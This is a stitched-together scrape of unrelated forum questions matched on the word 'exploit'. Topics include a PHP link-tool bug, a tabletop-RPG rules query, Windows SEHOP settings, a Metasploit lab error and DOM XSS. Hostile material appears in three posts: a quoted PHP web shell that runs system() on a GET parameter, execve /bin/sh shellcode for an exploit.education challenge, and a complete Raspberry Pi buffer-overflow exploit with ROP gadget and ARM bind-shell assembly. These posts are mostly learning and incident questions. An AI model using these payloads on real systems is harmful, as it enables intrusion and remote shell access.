Version 15.20 has stopped making PHP Info Exploit Links

It seems that version 15.20 no longer makes PHP info exploit links. I have an install still running 15.19 and 15.17 and both are still working for these sites and makes over 500 links.
Version 15.20 literally makes zero links now. In the logs it shows the following: https://www.screencast.com/t/ShaV3N8C4Oo
Those same urls are all successful on previous versions. Hope you can fix it.

Does Dimentional Slide arcanist exploit allows you to avoid AoO from the starting possition of movement?

I recently had a discussion with my GM about Dimensional Slide exploit. The problem is the wording of the exploit:

"This ability is used as part of a move action or withdraw action, allowing her to move up to 10 feet per arcanist level to any location she can see. This counts as 5 feet of movement. She can only use this ability once per round. She does not provoke attacks of opportunity when moving in this way, but any other movement she attempts as part of her move action provokes as normal."

I haven’t found any rules about the description of "as a part of move action". Is it ment that I must start moving, for example, from threatened square, provoking an AoO, then do DS, or simply perform DS w/o any AoOs?

It is unclear that "as part of the action" require you to make this action exclusively in the middle of an action, not before or after it.

Please, follow your answer with some rules link, so it can be approved point, not just an opinion, because i really need some solid evidence ;D

Thank you.

P.S. I’ve read the thread below, and it states that I can avoid AoOs from any point of blinking, but it has no proof of ability to do so by rules.

Arcanist Dimensional Slide usage specific cases!

Backdoor exploit – could they have downloaded files from server?

Due to a customer running old WordPress plugins, a php file with the following code was added to their website:

‰PNG <?php $  str = $  _GET['cmd']; system($  str); ?> 

The above file was detected by Wordfence as "Backdoor:PNG/ImageMagic.7484 Executable code masquerading as an image."

This (or another exploit) appears to have give the intruder the ability to at least upload files as text files containing the words "Hacked by …" were added to various places on the server.

Using this exploit, what kind of access would be allowed onto the server besides the ability to upload files? Could they have also downloaded files from anywhere on the server?

We are running a cPanel environment on Apache, MySQL and PHP.

Android exploit demos to scare my parents?

I recently discovered that my parents’ android phones have not received security updates for years. When I talked to them I realized that the benefit of software updates is very abstract to them and that they clearly felt like I was overreacting.

I personally really understood importance of software updates by watching exploit demos at IT conferences. So now I am wondering: Are there such demos aimed at educating everyday users?

I am thinking of something like https://haveibeenpwned.com/ or https://amiunique.org/ but for android.

Windows Exploit Protection: what is SEHOP setting: “TelemetryOnly” for?

I’m reading myself into the different exploit protection methods from MS. One is SEHOP, if I check it e.g. with PS:

Get-ProcessMitigation -System

I get:

    Enable                             : NOTSET     TelemetryOnly                      : OFF     Audit                              : NOTSET     Override SEHOP                     : False 

What is "TelemetryOnly" ? Internet search was not successful so fare.

Thanks for hints and resources!

VSFTPD Exploit failed, unreachable

Working on a school project and I’m encountering an issue when trying to run the exploit in Metasploit. I’m using the vsftp exploit and when I run the exploit an error pops up:

"Exploit failed [unreachable]: Rex::ConnectionRefused The connectionw as refused by the remote host (192.168.1.1:21) Exploit Completed, but no session was created."

Running all this in a VM of Kali Linux.

Any help would be appreciated.

How to Exploit DOM XSS? [closed]

Is it exploitable or not?

Issue detail

The application may be vulnerable to DOM-based cross-site scripting. Data is read from window.location and passed to the wrap()‘ function of JQuery via the following statement:

Turbolinks.Location.wrap(window.location)   ("replace",e,t)},e.prototype.onPopState=function(e){var t,n,i,a;return this.shouldHandlePopState()&&(a=null!=(n=e.state)?n.turbolinks:void 0)?(t=Turbolinks.Location.wrap(window.location),i=a.restorationIdentifier,this.delegate.historyPoppedToLocationWithRestorationIdentifier(t,i)):void 0}, 

enter image description here

Exploit education stack-five: trouble opening shell

Im trying the phoenix vm, challenge stack-five on exploit.education (http://exploit.education/phoenix/stack-five/). I run onto a problem while exploiting a stack overflow. The challenge is run execve(‘/bin/sh’) through shellcode. I grabbed the shellcode from shellstorm (http://shell-storm.org/shellcode/files/shellcode-603.php). The shellcode consists of:

[NOP slide] (debug int3 \xcc) "\x48\x31\xd2"                                  // xor    %rdx, %rdx "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov  $  0x68732f6e69622f2f, %rbx "\x48\xc1\xeb\x08"                              // shr    $  0x8, %rbx "\x53"                                          // push   %rbx "\x48\x89\xe7"                                  // mov    %rsp, %rdi "\x50"                                          // push   %rax "\x57"                                          // push   %rdi "\x48\x89\xe6"                                  // mov    %rsp, %rsi "\xb0\x3b"                                      // mov    $  0x3b, %al "\x0f\x05";                                     // syscall (debug int3 \xcc) [padding] [override rip pointing to the middle of the NOP slide] 

I have tested int3’s before and after the shellcode and all seems fine, they both trigger outside and inside gdb and therefore I infer that the shellcode is being executed but i cannot get the shell open.

I’m using this commands:

cat | /opt/phoenix/amd64/stack-five < exploit 
cat exploit - | /opt/phoenix/amd64/stack-five 

Neither of them gets the shell.

Example of execution

user@phoenix-amd64:~$   cat exploit - | /opt/phoenix/amd64/stack-five cat exploit - | /opt/phoenix/amd64/stack-five Welcome to phoenix/stack-five, brought to you by https://exploit.education [ 7018.986649] traps: stack-five[433] trap int3 ip:7fffffffe68e sp:7fffffffe6c8 error:0 whoami Trace/breakpoint trap 

This int3 is AFTER the shellcode.

Some idea of what’s wrong?

How can I exploit a bufferoverflow on a Raspberry Pi 4?

I am trying to exploit a bufferoverflow on raspberry pi 4 which makes use of Cortex-A72 (ARM v8) 64-bit SoC. The linux kernel version is v4.19 and the OS a Debian Buster compiled for the raspberry pi arm architecture.

Vulnerable code

#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h>  int main(int argc, char **argv) {   char buffer[64];    gets(buffer); } 

Compilation options
The code above is compiled with all protections deactivated.

gcc -no-pie -Wl,-z,norelro -fno-stack-protector -z execstack program.c -o program 

enter image description here

Payload
The payload is generated with the following perl code:

#!/usr/local/bin/perl  $  nopsled = "\x01\x10\xa0\xe1"; $  gad_blx_sp = "\xD5\xAF\xE7\xB6"; # adress for gadget "blx sp" in libc  $  Shellcode= "\x06\x60\x46\xe0" . "\x01\x30\x8f\xe2" . "\x13\xff\x2f\xe1" . "\x02\x20\x01\x21" . "\x92\x1a\xc8\x27" . "\x51\x37\x01\xdf" . "\x04\x1c\x12\xa1" . "\x4a\x70\x0e\x71" . "\x4a\x71\x8a\x71" . "\xca\x71\x10\x22" . "\x01\x37\x01\xdf" . "\xc0\x46\x20\x1c" . "\x02\x21\x02\x37" . "\x01\xdf\x20\x1c" . "\x49\x1a\x92\x1a" . "\x01\x37\x01\xdf" . "\x04\x1c\x3f\x27" . "\x20\x1c\x49\x1a" . "\x01\xdf\x20\x1c" . "\x01\x31\x01\xdf" . "\x20\x1c\x01\x31" . "\x01\xdf\x05\xa0" . "\x49\x40\x52\x40" . "\xc2\x71\x0b\x27" . "\x01\xdf\xc0\x46" . "\x02\xff\x11\x5c" . "\x01\x01\x01\x01" . "\x2f\x62\x69\x6e" . "\x2f\x73\x68\x58" . "\x00\x00\x00\x00";  print "$  nopsled" x 17; # 4 bytes x 17 = 68 print "$  gad_blx_sp"; print "$  Shellcode"; 

The gadget location in libc (B6E7 AFD5 in big endian) was found by searching for it with ropper:

Blx gadget adress

It’s absolute adress during execution can calculated by adding it to the adress found with the Vmmap command in gdb enhancement tool gef:

Gef vmmap command

Shellcode
The shellcode that you can see in the perl above above was assembled with assembly code that you can find on Azeria’s website. I changed it a little to avoid a badchar. More details from Azeria on her amazing website https://azeria-labs.com/tcp-bind-shell-in-assembly-arm-32-bit/ :

.section .text .global _start     _start:     .ARM     sub r6, r6, r6     //use r6 used instead of r2 during strb r6, [r1, #4] below to avoid badchar 0x0a     add r3, pc, #1         // switch to thumb mode     bx r3      .THUMB // socket(2, 1, 0)     mov r0, #2     mov r1, #1     sub r2, r2, r2      // set r2 to null     mov r7, #200        // r7 = 281 (socket)     add r7, #81         // r7 value needs to be split     svc #1              // r0 = host_sockid value     mov r4, r0          // save host_sockid in r4 // bind(r0, &sockaddr, 16)     adr  r1, struct_addr // pointer to address, port     strb r2, [r1, #1]    // write 0 for AF_INET     strb r6, [r1, #4]    // replace 1 with 0 in x.1.1.1     strb r2, [r1, #5]    // replace 1 with 0 in 0.x.1.1     strb r2, [r1, #6]    // replace 1 with 0 in 0.0.x.1     strb r2, [r1, #7]    // replace 1 with 0 in 0.0.0.x     mov r2, #16          // struct address length     add r7, #1           // r7 = 282 (bind)     svc #1     nop  // listen(sockfd, 0)     mov r0, r4           // set r0 to saved host_sockid     mov r1, #2     add r7, #2           // r7 = 284 (listen syscall number)     svc #1  // accept(sockfd, NULL, NULL);     mov r0, r4           // set r0 to saved host_sockid     sub r1, r1, r1       // set r1 to null     sub r2, r2, r2       // set r2 to null     add r7, #1           // r7 = 284+1 = 285 (accept syscall)     svc #1               // r0 = client_sockid value     mov r4, r0           // save new client_sockid value to r4  // dup2(sockfd, 0)     mov r7, #63         // r7 = 63 (dup2 syscall number)     mov r0, r4          // r4 is the saved client_sockid     sub r1, r1, r1      // r1 = 0 (stdin)     svc #1  // dup2(sockfd, 1)     mov r0, r4          // r4 is the saved client_sockid     add r1, #1          // r1 = 1 (stdout)     svc #1  // dup2(sockfd, 2)     mov r0, r4          // r4 is the saved client_sockid     add r1, #1          // r1 = 2 (stderr)     svc #1  // execve("/bin/sh", 0, 0)     adr r0, shellcode   // r0 = location of "/bin/shX"     eor r1, r1, r1      // clear register r1. R1 = 0     eor r2, r2, r2      // clear register r2. r2 = 0     strb r2, [r0, #7]   // store null-byte for AF_INET     mov r7, #11         // execve syscall number     svc #1     nop  struct_addr: .ascii "\x02\xff" // AF_INET 0xff will be NULLed .ascii "\x11\x5c" // port number 4444 .byte 1,1,1,1 // IP Address shellcode: .ascii "/bin/shX" 

The following command can be used to generate the ascii equivalent of the code above after assembly:

as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell objcopy -O binary bind_shell bind_shell.bin hexdump -v -e '"\""x" 1/1 "%02x" ""' bind_shell.bin  

During execution
Now when everything is setup (executable compiled, payload ready with gadget adress and shellcode) in gdb when I enter the payload after launching the executable I get a SIGILL error. I do not know what is causing it.

Sigill error message

Below is some exception context info

sigill context info

The payload works fine on Raspberry Pi 3 but not on Raspberry Pi 4, both execute kernel 4.19 and Os Raspbian Buster.

NOTE : I do not get this error when stepping into the shellcode on the stack tough.

Question : Does anybode know what new protection measure on the SOC/kernel/os could be the cause? How can I deactivate these security measures?